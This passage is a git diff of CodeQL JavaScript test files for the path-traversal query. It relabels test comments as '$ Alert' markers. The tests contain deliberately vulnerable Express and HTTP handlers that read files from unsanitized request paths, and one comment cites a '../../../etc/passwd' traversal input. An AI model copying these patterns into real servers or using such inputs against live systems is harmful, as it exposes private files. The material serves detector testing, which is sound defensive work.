/^([ァ-ヾ]|[ァ-ン゙゚])+$/; +var tst3 = /[0-90-9]/; -var question = /[0-?]/; // OK. matches one of: 0123456789:;<=>? +var question = /[0-?]/; // OK - matches one of: 0123456789:;<=>? -var atToZ = /[@-Z]/; // OK. matches one of: @ABCDEFGHIJKLMNOPQRSTUVWXYZ \ No newline at end of file +var atToZ = /[@-Z]/; // OK - matches one of: @ABCDEFGHIJKLMNOPQRSTUVWXYZ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js index f7c6d172ead2..2c915a920b16 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js @@ -6,6 +6,5 @@ import { join } from 'path'; var server = createServer(function(req, res) { let path = parse(req.url, true).query.path; - // BAD: This could read any file on the file system - res.write(readFileSync(join("public", path))); + res.write(readFileSync(join("public", path))); // $ Alert - This could read any file on the file system }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js index fd768fecfff8..b598cbee74bf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js @@ -8,63 +8,52 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - // BAD: This could read any file on the file system - res.write(fs.readFileSync(path)); + res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system - // BAD: This could still read any file on the file system - res.write(fs.readFileSync("/home/user/" + path)); + res.write(fs.readFileSync("/home/user/" + path)); // $ Alert - This could still read any file on the file system if (path.startsWith("/home/user/")) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (path.indexOf("secret") == -1) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (fs.existsSync(path)) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (path === 'foo.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list if (path === 'foo.txt' || path === 'bar.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list if (path === 'foo.txt' || path === 'bar.txt' || someOpaqueCondition()) - res.write(fs.readFileSync(path)); // BAD: Path is incompletely compared to white-list + res.write(fs.readFileSync(path)); // $ Alert - Path is incompletely compared to white-list path = sanitize(path); - res.write(fs.readFileSync(path)); // GOOD: Path is sanitized + res.write(fs.readFileSync(path)); // OK - Path is sanitized path = url.parse(req.url, true).query.path; - // GOOD: basename is safe + // OK - basename is safe res.write(fs.readFileSync(pathModule.basename(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.dirname(path))); - // GOOD: extname is safe + res.write(fs.readFileSync(pathModule.dirname(path))); // $ Alert - taint is preserved + // OK - extname is safe res.write(fs.readFileSync(pathModule.extname(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.join(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.join(x, y, path, z))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.normalize(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.relative(x, path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.relative(path, x))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.resolve(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.resolve(x, y, path, z))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.toNamespacedPath(path))); + res.write(fs.readFileSync(pathModule.join(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.join(x, y, path, z))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.normalize(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.relative(x, path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.relative(path, x))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.resolve(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.resolve(x, y, path, z))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.toNamespacedPath(path))); // $ Alert - taint is preserved }); var server = http.createServer(function(req, res) { // tests for a few uri-libraries - res.write(fs.readFileSync(require("querystringify").parse(req.url).query)); // NOT OK - res.write(fs.readFileSync(require("query-string").parse(req.url).query)); // NOT OK - res.write(fs.readFileSync(require("querystring").parse(req.url).query)); // NOT OK + res.write(fs.readFileSync(require("querystringify").parse(req.url).query)); // $ Alert + res.write(fs.readFileSync(require("query-string").parse(req.url).query)); // $ Alert + res.write(fs.readFileSync(require("querystring").parse(req.url).query)); // $ Alert }); (function(){ @@ -100,7 +89,7 @@ var server = http.createServer(function(req, res) { path = path.replace(/\.\./g, ''); // remove all ".." } - res.write(fs.readFileSync(path)); // OK. Is sanitized above. + res.write(fs.readFileSync(path)); // OK - Is sanitized above. }); var server = http.createServer(function(req, res) { @@ -113,36 +102,36 @@ var server = http.createServer(function(req, res) { path = path.replace(/\.\./g, ''); // remove all ".." } - res.write(fs.readFileSync(path)); // OK. Is sanitized above. + res.write(fs.readFileSync(path)); // OK - Is sanitized above. }); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - require('send')(req, path); // NOT OK + require('send')(req, path); // $ Alert }); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var split = path.split("/"); - fs.readFileSync(split.join("/")); // NOT OK + fs.readFileSync(split.join("/")); // $ Alert - fs.readFileSync(prefix + split[split.length - 1]) // OK + fs.readFileSync(prefix + split[split.length - 1]) - fs.readFileSync(split[x]) // NOT OK - fs.readFileSync(prefix + split[x]) // NOT OK + fs.readFileSync(split[x]) // $ Alert + fs.readFileSync(prefix + split[x]) // $ Alert var concatted = prefix.concat(split); - fs.readFileSync(concatted.join("/")); // NOT OK + fs.readFileSync(concatted.join("/")); // $ Alert var concatted2 = split.concat(prefix); - fs.readFileSync(concatted2.join("/")); // NOT OK + fs.readFileSync(concatted2.join("/")); // $ Alert - fs.readFileSync(split.pop()); // NOT OK + fs.readFileSync(split.pop()); // $ Alert }); @@ -150,33 +139,33 @@ var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; // Removal of forward-slash or dots. - res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); // OK. - res.write(fs.readFileSync(path.replace(/[abcd]/g, ''))); // NOT OK - res.write(fs.readFileSync(path.replace(/[./]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/[foobar/foobar]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\//g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\.|\//g, ''))); // OK - - res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/\./g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); + res.write(fs.readFileSync(path.replace(/[abcd]/g, ''))); // $ Alert + res.write(fs.readFileSync(path.replace(/[./]/g, ''))); + res.write(fs.readFileSync(path.replace(/[foobar/foobar]/g, ''))); + res.write(fs.readFileSync(path.replace(/\//g, ''))); + res.write(fs.readFileSync(path.replace(/\.|\//g, ''))); + + res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/\./g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // $ Alert - can be absolute if (!pathModule.isAbsolute(path)) { - res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\./g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // OK + res.write(fs.readFileSync(path.replace(/[.]/g, ''))); + res.write(fs.readFileSync(path.replace(/[..]/g, ''))); + res.write(fs.readFileSync(path.replace(/\./g, ''))); + res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); } // removing of "../" from prefix. - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.[\/\\])+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)*/, ''))); // OK + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.[\/\\])+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)*/, ''))); - res.write(fs.readFileSync("prefix" + path.replace(/^(\.\.[\/\\])+/, ''))); // NOT OK - not normalized - res.write(fs.readFileSync(pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync("prefix" + path.replace(/^(\.\.[\/\\])+/, ''))); // $ Alert - not normalized + res.write(fs.readFileSync(pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // $ Alert - can be absolute }); import normalizeUrl from 'normalize-url'; @@ -184,38 +173,38 @@ import normalizeUrl from 'normalize-url'; var server = http.createServer(function(req, res) { // tests for a few more uri-libraries const qs = require("qs"); - res.write(fs.readFileSync(qs.parse(req.url).foo)); // NOT OK - res.write(fs.readFileSync(qs.parse(normalizeUrl(req.url)).foo)); // NOT OK + res.write(fs.readFileSync(qs.parse(req.url).foo)); // $ Alert + res.write(fs.readFileSync(qs.parse(normalizeUrl(req.url)).foo)); // $ Alert const parseqs = require("parseqs"); - res.write(fs.readFileSync(parseqs.decode(req.url).foo)); // NOT OK + res.write(fs.readFileSync(parseqs.decode(req.url).foo)); // $ Alert }); const cp = require("child_process"); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - cp.execSync("foobar", {cwd: path}); // NOT OK - cp.execFileSync("foobar", ["args"], {cwd: path}); // NOT OK - cp.execFileSync("foobar", {cwd: path}); // NOT OK + cp.execSync("foobar", {cwd: path}); // $ Alert + cp.execFileSync("foobar", ["args"], {cwd: path}); // $ Alert + cp.execFileSync("foobar", {cwd: path}); // $ Alert }); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; // Removal of forward-slash or dots. - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); // OK - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", ''), ''))); // NOT OK. - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", unknownFlags()), ''))); // OK -- Might be okay depending on what unknownFlags evaluates to. + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", ''), ''))); // $ Alert + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", unknownFlags()), ''))); // OK - Might be okay depending on what unknownFlags evaluates to. }); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // $ Alert - can be absolute if (!pathModule.isAbsolute(path)) { - res.write(fs.readFileSync(path.replace(new RegExp("[.]", ''), ''))); // NOT OK - res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // OK - res.write(fs.readFileSync(path.replace(new RegExp("[.]", unknownFlags()), ''))); // OK + res.write(fs.readFileSync(path.replace(new RegExp("[.]", ''), ''))); // $ Alert + res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); + res.write(fs.readFileSync(path.replace(new RegExp("[.]", unknownFlags()), ''))); } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js index 1fdbef68c47e..a3e4028b0daa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js @@ -7,6 +7,5 @@ const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { let filePath = url.parse(req.url, true).query.path; - // BAD: This function uses unsanitized input that can read any file on the file system. - res.write(fs.readFileSync(ROOT + filePath, 'utf8')); + res.write(fs.readFileSync(ROOT + filePath, 'utf8')); // $ Alert - This function uses unsanitized input that can read any file on the file system. }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js index ac8dd4fb9ba8..5b497cfddccb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js @@ -8,7 +8,7 @@ const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { let filePath = url.parse(req.url, true).query.path; - // GOOD: Verify that the file path is under the root directory + // OK - Verify that the file path is under the root directory filePath = fs.realpathSync(path.resolve(ROOT, filePath)); if (!filePath.startsWith(ROOT)) { res.statusCode = 403; diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js index 512b851592aa..93255a7ab518 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js @@ -26,27 +26,27 @@ function init() { init(); app.get('/some/path1', function (req, res) { - res.send(data.compiledFileAccess({ path: req.params.path })); // NOT ALLOWED (template uses vulnerable catFile) + res.send(data.compiledFileAccess({ path: req.params.path })); // $ Alert - template uses vulnerable catFile }); app.get('/some/path2', function (req, res) { - res.send(data.compiledBenign({ name: req.params.name })); // ALLOWED (this template does not use catFile) + res.send(data.compiledBenign({ name: req.params.name })); // OK - this template does not use catFile }); app.get('/some/path3', function (req, res) { - res.send(data.compiledUnknown({ name: req.params.name })); // ALLOWED (could be using a vulnerable helper, but we'll assume it's ok) + res.send(data.compiledUnknown({ name: req.params.name })); // OK - could be using a vulnerable helper, but we'll assume it's ok }); app.get('/some/path4', function (req, res) { res.send(data.compiledMixed({ prefix: ">>> ", - path: req.params.path // NOT ALLOWED (template uses vulnerable helper) + path: req.params.path // $ Alert - template uses vulnerable helper })); }); app.get('/some/path5', function (req, res) { res.send(data.compiledMixed({ - prefix: req.params.prefix, // ALLOWED (this parameter is safe) + prefix: req.params.prefix, // OK - this parameter is safe path: "data/path-5.txt" })); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js index 4fa6b3f50d54..2c251b8de379 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js @@ -10,21 +10,21 @@ let app = express(); app.get('/basic', (req, res) => { let path = req.query.path; - fs.readFileSync(path); // NOT OK - fs.readFileSync('./' + path); // NOT OK - fs.readFileSync(path + '/index.html'); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK - fs.readFileSync(pathModule.join('/home/user/www', path)); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync('./' + path); // $ Alert + fs.readFileSync(path + '/index.html'); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert + fs.readFileSync(pathModule.join('/home/user/www', path)); // $ Alert }); app.get('/normalize', (req, res) => { let path = pathModule.normalize(req.query.path); - fs.readFileSync(path); // NOT OK - fs.readFileSync('./' + path); // NOT OK - fs.readFileSync(path + '/index.html'); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK - fs.readFileSync(pathModule.join('/home/user/www', path)); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync('./' + path); // $ Alert + fs.readFileSync(path + '/index.html'); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert + fs.readFileSync(pathModule.join('/home/user/www', path)); // $ Alert }); app.get('/normalize-notAbsolute', (req, res) => { @@ -33,21 +33,21 @@ app.get('/normalize-notAbsolute', (req, res) => { if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.startsWith(".")) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity if (!path.startsWith("..")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (!path.startsWith("../")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (!path.startsWith(".." + pathModule.sep)) - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/normalize-noInitialDotDot', (req, res) => { @@ -56,16 +56,16 @@ app.get('/normalize-noInitialDotDot', (req, res) => { if (path.startsWith("..")) return; - fs.readFileSync(path); // NOT OK - could be absolute + fs.readFileSync(path); // $ Alert - could be absolute fs.readFileSync("./" + path); // OK - coerced to relative - fs.readFileSync(path + "/index.html"); // NOT OK - not coerced + fs.readFileSync(path + "/index.html"); // $ Alert - not coerced if (!pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/prepend-normalize', (req, res) => { @@ -73,9 +73,9 @@ app.get('/prepend-normalize', (req, res) => { let path = pathModule.normalize('./' + req.query.path); if (!path.startsWith("..")) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/absolute', (req, res) => { @@ -84,10 +84,10 @@ app.get('/absolute', (req, res) => { if (!pathModule.isAbsolute(path)) return; - res.write(fs.readFileSync(path)); // NOT OK + res.write(fs.readFileSync(path)); // $ Alert if (path.startsWith('/home/user/www')) - res.write(fs.readFileSync(path)); // NOT OK - can still contain '../' + res.write(fs.readFileSync(path)); // $ Alert - can still contain '../' }); app.get('/normalized-absolute', (req, res) => { @@ -96,10 +96,10 @@ app.get('/normalized-absolute', (req, res) => { if (!pathModule.isAbsolute(path)) return; - res.write(fs.readFileSync(path)); // NOT OK + res.write(fs.readFileSync(path)); // $ Alert if (path.startsWith('/home/user/www')) - res.write(fs.readFileSync(path)); // OK + res.write(fs.readFileSync(path)); }); app.get('/combined-check', (req, res) => { @@ -107,53 +107,53 @@ app.get('/combined-check', (req, res) => { // Combined absoluteness and folder check in one startsWith call if (path.startsWith("/home/user/www")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (path[0] !== "/" && path[0] !== ".") - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/realpath', (req, res) => { let path = fs.realpathSync(req.query.path); - fs.readFileSync(path); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert if (path.startsWith("/home/user/www")) fs.readFileSync(path); // OK - both absolute and normalized before check fs.readFileSync(pathModule.join('.', path)); // OK - normalized and coerced to relative - fs.readFileSync(pathModule.join('/home/user/www', path)); // OK + fs.readFileSync(pathModule.join('/home/user/www', path)); }); app.get('/coerce-relative', (req, res) => { let path = pathModule.join('.', req.query.path); if (!path.startsWith('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/coerce-absolute', (req, res) => { let path = pathModule.join('/home/user/www', req.query.path); if (path.startsWith('/home/user/www')) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/concat-after-normalization', (req, res) => { let path = 'foo/' + pathModule.normalize(req.query.path); if (!path.startsWith('..')) - fs.readFileSync(path); // NOT OK - prefixing foo/ invalidates check + fs.readFileSync(path); // $ Alert - prefixing foo/ invalidates check else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.includes('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/noDotDot', (req, res) => { @@ -162,12 +162,12 @@ app.get('/noDotDot', (req, res) => { if (path.includes('..')) return; - fs.readFileSync(path); // NOT OK - can still be absolute + fs.readFileSync(path); // $ Alert - can still be absolute if (!pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/join-regression', (req, res) => { @@ -181,119 +181,119 @@ app.get('/join-regression', (req, res) => { if (path.startsWith('/x')) {path;} else {path;} if (path.startsWith('.')) {path;} else {path;} - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (pathModule.isAbsolute(path)) - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (path.includes('..')) - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.includes('..') && !pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert let normalizedPath = pathModule.normalize(path); if (normalizedPath.startsWith('/home/user/www')) - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); else - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert if (normalizedPath.startsWith('/home/user/www') || normalizedPath.startsWith('/home/user/public')) - fs.readFileSync(normalizedPath); // OK - but flagged anyway [INCONSISTENCY] + fs.readFileSync(normalizedPath); // $ SPURIOUS: Alert else - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert }); app.get('/decode-after-normalization', (req, res) => { let path = pathModule.normalize(req.query.path); if (!pathModule.isAbsolute(path) && !path.startsWith('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); path = decodeURIComponent(path); if (!pathModule.isAbsolute(path) && !path.startsWith('..')) - fs.readFileSync(path); // NOT OK - not normalized + fs.readFileSync(path); // $ Alert - not normalized }); app.get('/replace', (req, res) => { let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); if (!pathModule.isAbsolute(path)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert path = path.replace(/\.\./g, ''); - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); app.get('/resolve-path', (req, res) => { let path = pathModule.resolve(req.query.path); - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var self = something(); if (path.substring(0, self.dir.length) === self.dir) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity if (path.slice(0, self.dir.length) === self.dir) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity }); app.get('/relative-startswith', (req, res) => { let path = pathModule.resolve(req.query.path); - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var self = something(); var relative = pathModule.relative(self.webroot, path); if(relative.startsWith(".." + pathModule.sep) || relative == "..") { - fs.readFileSync(path); // NOT OK! + fs.readFileSync(path); // $ Alert } else { - fs.readFileSync(path); // OK! + fs.readFileSync(path); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (relativePath.indexOf('..' + pathModule.sep) === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (relativePath.indexOf('../') === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (pathModule.normalize(relativePath).indexOf('../') === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (pathModule.normalize(relativePath).indexOf('../')) { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } else { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } }); @@ -301,35 +301,35 @@ var isPathInside = require("is-path-inside"), pathIsInside = require("path-is-inside"); app.get('/pseudo-normalizations', (req, res) => { let path = req.query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (isPathInside(path, SAFE)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); return; } else { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (pathIsInside(path, SAFE)) { - fs.readFileSync(path); // NOT OK - can be of the form 'safe/directory/../../../etc/passwd' + fs.readFileSync(path); // $ Alert - can be of the form 'safe/directory/../../../etc/passwd' return; } else { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } let normalizedPath = pathModule.join(SAFE, path); if (pathIsInside(normalizedPath, SAFE)) { - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); return; } else { - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert } if (pathIsInside(normalizedPath, SAFE)) { - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); return; } else { - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert } @@ -338,34 +338,34 @@ app.get('/pseudo-normalizations', (req, res) => { app.get('/yet-another-prefix', (req, res) => { let path = pathModule.resolve(req.query.path); - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var abs = pathModule.resolve(path); if (abs.indexOf(root) !== 0) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert return; } - fs.readFileSync(path); // OK + fs.readFileSync(path); }); var rootPath = process.cwd(); app.get('/yet-another-prefix2', (req, res) => { let path = req.query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var requestPath = pathModule.join(rootPath, path); var targetPath; if (!allowPath(requestPath, rootPath)) { targetPath = rootPath; - fs.readFileSync(requestPath); // NOT OK + fs.readFileSync(requestPath); // $ Alert } else { targetPath = requestPath; - fs.readFileSync(requestPath); // OK + fs.readFileSync(requestPath); } - fs.readFileSync(targetPath); // OK + fs.readFileSync(targetPath); function allowPath(requestPath, rootPath) { return requestPath.indexOf(rootPath) === 0; @@ -376,56 +376,56 @@ import slash from 'slash'; app.get('/slash-stuff', (req, res) => { let path = req.query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert - fs.readFileSync(slash(path)); // NOT OK + fs.readFileSync(slash(path)); // $ Alert }); app.get('/dotdot-regexp', (req, res) => { let path = pathModule.normalize(req.query.x); if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.match(/\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\.\//)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\.\/foo/)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (!path.match(/(\.\.\/|\.\.\\)/)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); app.get('/join-spread', (req, res) => { - fs.readFileSync(pathModule.join('foo', ...req.query.x.split('/'))); // NOT OK - fs.readFileSync(pathModule.join(...req.query.x.split('/'))); // NOT OK + fs.readFileSync(pathModule.join('foo', ...req.query.x.split('/'))); // $ Alert + fs.readFileSync(pathModule.join(...req.query.x.split('/'))); // $ Alert }); app.get('/dotdot-matchAll-regexp', 